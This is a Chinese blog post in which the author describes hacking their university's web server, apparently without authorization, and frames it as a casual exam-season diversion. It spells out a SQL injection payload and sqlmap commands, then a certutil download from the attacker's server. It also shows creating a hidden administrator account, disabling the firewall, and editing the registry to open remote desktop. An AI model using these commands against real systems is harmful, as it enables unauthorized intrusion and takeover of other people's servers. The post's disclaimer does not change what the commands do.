实战 | 记一次对母校站点的渗透测试

1337163122

实战 | 记一次对母校站点的渗透测试何止 HACK之道 今天
收录于话题
#渗透实战
8个
​
HACK之道
HACK之道，专注于红队攻防、实战技巧、CTF比赛、安全开发、安全运维、安全架构等精华技术文章及渗透教程、安全工具的分享。
12篇原创内容
公众号
声明：本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本号及原作者无关。前言
备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)
​
测试到注入

• 
  

http://url/newdetail.aspx?id=11999' or 1=1 --
直接Sqlmap一把过 , 连waf都没得(狗头)
随便看看

1. 
   
2. python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs
   
3. python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users

复制代码

​
DBMS
sqlserver 2005
​
whoami
在windows中nt authority system 是内置的系统管理账户
​
查看下目录chdir
​
Dir c:\
​
OS版本
Microsoft(R) Windows(R) Server 2003, Enterprise Edition
​
ipconfig
​
服务器端存在certutil等于是决定测试一下命令
vps

python -m SimpleHTTPServer 80

打一下

1. 
   
2. ping wt070h.dnslog.cn
   
3. certutil.exe -urlcache -split -f http://funny_ip/amazing1x

复制代码

发现回显
​

奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果
​
看看环境变量
​
Nmap看看端口
因为尝试远程连接的时候出了一些问题，起初不知道是什么原因所以打算看看
​
尝试远程连接3389
新建用户

1. #新建用户
   
2. net user amazingadmin123 amazing.123456 /add
   
3. #赋予权限
   
4. net localgroup Administrators amazingadmin123 /add
   
5. #激活用户
   
6. net user amazingadmin123 /active:yes
   
7. #关闭防火墙
   
8. netsh firewall set opmode mode=disable
   
9. #开启默认设置 netsh firewall reset

复制代码

通过注册表开启3389端口

1. echo Windows Registry Editor Version 5.00 >>3389.reg
   
2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
   
3. echo "fDenyTSConnections"=dword:00000000 >>3389.reg
   
4. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
   
5. echo "ortNumber"=dword:00000D3D >>3389.reg
   
6. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
   
7. echo "PortNumber"=dword:00000D3D >>3389.reg
   
8. regedit /s 3389.reg

复制代码

相关记录
​
相关记录
​
这个过程连续尝试了两三次都没有成功，也没找到原因，服务还关了，只能先考试等管理员开机了
​
考完试第三天网站上线了，再试试新建用户……
原来是安全策略的问题，不能使用简单地密码，新建用户的时候用了个复杂的密码就行了
远程连接✔️
​
配置加载中……
​
​
点到即止！